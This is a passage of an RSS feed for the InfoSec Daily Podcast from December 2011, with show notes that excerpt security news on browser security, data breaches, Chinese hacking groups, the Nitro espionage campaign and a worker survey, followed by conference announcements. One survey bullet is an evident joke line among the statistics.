	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Accuvant LABS has deemed Google Chrome to be the most secured against attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Associated Research Paper: </span><a href="http://www.accuvant.com/capability/accuvant-labs/security-research/browser-security-comparison-quantitative-approach"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.accuvant.com/capability/accuvant-labs/security-research/browser-security-comparison-quantitative-approach</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.itworldcanada.com/news/internet-identitys-top-security-trends-of-2011/144470"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.itworldcanada.com/news/internet-identitys-top-security-trends-of-2011/144470</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online threats to organizations have shifted to a higher level this year than ever before, says a senior executive of a software security firm.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I think the overall theme is what people are saying everywhere; it&rsquo;s getting serious,&rdquo; Rod Rasmussen, president and chief technology officer of Internet Identity, said in an interview. &ldquo;This is no longer fun and games or even stealing money, credit card information from someone to make a quick buck.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It was one of top seven security trends Tacoma, Wash.-based </span><a href="http://www.internetidentity.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Internet Identity</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (IID) spotted during the last 12 months.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IID named 2011 &ldquo;The year of the data breach&rdquo;. Everyone from Sony Corp.&rsquo;s Playstation to RSA was targeted and mass amounts of client data was lost into the wilds of the Internet. &ldquo;It&rsquo;s not ginormous like the TJ Max leak a couple of years ago but people are leaking data all over the place,&rdquo; Rasmussen said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He attributes this gain to a new black market for data stealing software. &ldquo;It&rsquo;s the commoditization, the commercialization of crimeware,&rdquo; he said. &ldquo;Anyone can get a ZeuS kit or a SpyEye.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rasmussen said cybercrime has undergone a sophistication in the last couple of years. &ldquo;There&rsquo;s a couple of different guys in the Eastern block [of Europe] that have combined and shifted around who have what source code for what,&rdquo; he said. &ldquo;New versions of these tools are coming out, with plug-ins and all kinds of stuff.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another trend is the boom in mobile malware due to the proliferation of smartphones. &ldquo;There will be far more mobile phones, or smartphones, than desktops and laptops in the near future,&rdquo; he said. This has led to a shift in focus for malware makers since mobile devices don&rsquo;t have the kind of deep security infrastructure that desktops have.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.impomag.com/scripts/ShowPR.asp?RID=20093&amp;et_cid=2372201&amp;et_rid=60868626&amp;CommonCount=0"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.impomag.com/scripts/ShowPR.asp?RID=20093&amp;et_cid=2372201&amp;et_rid=60868626&amp;CommonCount=0</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As few as 12 different Chinese groups, largely backed or directed by the government there, do the bulk of the China-based cyberattacks stealing critical data from U.S. companies and government agencies, according to U.S. cybersecurity analysts and experts.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The aggressive, but stealthy attacks, which steal billions of dollars in intellectual property and data, often carry distinct signatures allowing U.S. officials to link them to certain hacker teams. And, analysts say the U.S. often gives the attackers unique names or numbers, and at times can tell where the hackers are and even who they may be.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sketched out by analysts who have worked with U.S. companies and the government on computer intrusions, the details illuminate recent claims by American intelligence officials about the escalating cyber threat emanating from China. And the widening expanse of targets, coupled with the expensive and sensitive technologies they are losing, is putting increased pressure on the U.S. to take a much harder stand against the communist giant.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is largely impossible for the U.S. to prosecute hackers in China, since it requires reciprocal agreements between the two countries, and it is always difficult to provide ironclad proof that the hacking came from specific people.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Several analysts described the Chinese attacks, speaking on condition of anonymity because of the sensitivity of the investigations and to protect the privacy of clients. China has routinely rejected allegations of cyberspying and says it also is a target.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Industry is already feeling that they are at war,&quot; said James Cartwright, a retired Marine general and former vice chairman of the Joint Chiefs of Staff.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A recognized expert on cyber issues, Cartwright has come out strongly in favor of increased U.S. efforts to hold China and other countries accountable for the cyberattacks that come from within their borders.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2011/12/13/microsoft_android_malware/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/13/microsoft_android_malware/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	Microsoft is offering free Windows phones to Android malware victims, providing they are prepared to tell world+dog about their problems.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The marketing stunt &#8211; already given the hashtag</span><a href="http://twitter.com/#%21/search?q=%23droidrage"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">#droidrage</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Twitter &#8211; follows a run of publicity about android malware.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ben Rudolph (</span><a href="http://twitter.com/BenthePCGuy"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@BenthePCGuy</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), the Microsoft Windows Phone &quot;evangelist&quot; behind the social network ploy, is offering the five people with the worst stories free Windows smartphones as an alternative. It&#39;s unclear if the Android virus victims will be either asked or required to take part in advertising campaigns.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The marketing initiative has already attracted comment from security watchers. Graham Cluley, senior consultant at anti-virus firm Sophos,</span><a href="http://nakedsecurity.sophos.com/2011/12/13/microsoft-free-phones-android-malware-victims"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">described</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the move as a &quot;somewhat below-the-belt&quot; attempt to highlight the possible security deficiencies of Android rather than the benefits of Windows Phones.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hubristic promotion also rather overlooks the fact that the vast majority of malware samples (tens of millions against thousands on Android) only affect Windows desktops. Perhaps Microsoft is getting back at all those Apple ads from a few years back.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.pcadvisor.co.uk/news/security/3324811/industrial-espionage-gang-sends-malicious-emails-in-security-vendors-name"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.pcadvisor.co.uk/news/security/3324811/industrial-espionage-gang-sends-malicious-emails-in-security-vendors-name</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A cybercrime gang that primarily targets companies from the chemical industry has launched a new series of attacks that involve malware-laden emails purporting to be from Symantec, the security vendor responsible for exposing its operation earlier this year.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dubbed the Nitro attacks, the gang&#39;s original industrial espionage efforts began sometime in July and lasted until September. The attackers&#39; modus operandi involved sending emails that carried a variant of the Poison Ivy backdoor and were specifically crafted for each targeted company.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Despite being publicly exposed by Symantec in an October</span><a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_nitro_attacks.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the gang didn&#39;t give up on its plans and, in fact, stuck to many of its techniques.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The same group is still active, still targeting chemical companies, and still using the same social engineering modus operandi,&quot; security researchers from Symantec said in a blog post on Monday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;That is, they are sending targets a password-protected archive, through email, which contains a malicious executable,&quot; they added.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The interesting aspect about the gang&#39;s new attacks is that they are using Symantec&#39;s own report in order to trick victims. One email intercepted by the security company was crafted to appear as if it were sent by its technical support department and warns recipients that many enterprise computers were infected with Poison Ivy.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.computerweekly.com/news/2240112371/Addicted-workers-risk-overdosing-on-information"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerweekly.com/news/2240112371/Addicted-workers-risk-overdosing-on-information</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">UK workers are addicted to accessing work-related information 24 hours a day and risk drowning in it unless their business takes steps to support the information explosion, according to a survey.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The YouGov research, commissioned by Symantec, interviewed over 1,000 office workers about their relationships with information. It analysed how businesses can create an environment that supports workers in today&rsquo;s information heavy business environment. With data at the fingertips of employees on numerous devices 24 hours a day businesses are faced with security, storage and availability challenges.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The findings reveal British workers are addicted to information that risk drowning in outdated information:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">62% access work information electronically outside of normal business hours;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">69% take company information from the office network to work from home or elsewhere;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">57% who access work information outside office hours use a personal mobile;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">21% keep e-mails and files unnecessarily because they simply don&rsquo;t have time to sort through them;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">34% keep e-mails because they are concerned they won&rsquo;t be able to retrieve them later;</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">18% spend half an hour a day searching IT systems for information.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">37% of users think my horse is amazing</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-545-most-secure-browser-a-few-chinese-winphones-industrial-espionage-nitro-addicted-workers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3269/0/infosec-daily-podcast-episode-545.mp3" length="19732608" type="audio/mpeg" />
		<itunes:duration>0:40:38</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 545 for December 13, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Themson Mester.
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Br[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 545 for December 13, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Themson Mester.
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.accuvant.com/blog/2011/12/05/which-web-browser-is-most-secured
	Accuvant LABS has just released some new research that compares the security of three of the most widely used web browsers &#8211; Mozilla Firefox, Google Chrome, and Microsoft Internet Explorer. Google commissioned Accuvant to perform this comprehensive and independently designed security analysis to help advance the discussion of best practices in the security community. &#160;Our research findings are extremely thorough and complete, so we decided to create this blog to summarize the results.
	Malware, spyware and viruses are all too familiar to those who regularly surf the web. These malicious programs can lead to system pop-ups, slowdowns, account takeovers, credit card theft, identity theft, and the theft of personally identifiable information. While antivirus and anti-malware can help prevent an infection, the first line of defense is using a secure web browser. For a person that surfs the internet, comparing and contrasting the security of different web browsers is difficult. Marketing materials are available to the average user, but they often contain direct contradictions and the reader ends up wondering which web browser is the most secure. Our research aims to fix that problem. 
	We compared browsers from a layered perspective, taking into account security architecture and anti-exploitation techniques. &#160;&#160;Like antivirus or anti-malware software, each provides an additional layer of defense. The nice thing is, when anti-exploitation technology prevents an attack, anti-malware and antivirus aren&#39;t needed. The idea is that it&#8217;s a lot easier to keep a fortress with a moat safe than it is to protect a beach shack.
	&#8230;
	Accuvant LABS has deemed Google Chrome to be the most secured against attack.
	Associated Research Paper: http://www.accuvant.com/capability/accuvant-labs/security-research/browser-security-comparison-quantitative-approach

	Source: http://www.itworldcanada.com/news/internet-identitys-top-security-trends-of-2011/144470
	Onl[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 544 &#8211; Biggest Threat, GPS DoS, Government Malware Emporium, 3rd Party Faux Pas, Top 10 &amp; Most Secure Browser</title>
		<link>http://www.isdpodcast.com/episode-544-biggest-threat-gps-dos-government-malware-emporium-3rd-party-faux-pas-top-10-most-secure-browser</link>
		<comments>http://www.isdpodcast.com/episode-544-biggest-threat-gps-dos-government-malware-emporium-3rd-party-faux-pas-top-10-most-secure-browser#comments</comments>
		<pubDate>Tue, 13 Dec 2011 02:03:07 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3263</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 544 for December 12, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 544 for December 12, 2011. &nbsp;&nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SOLD OUT!!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
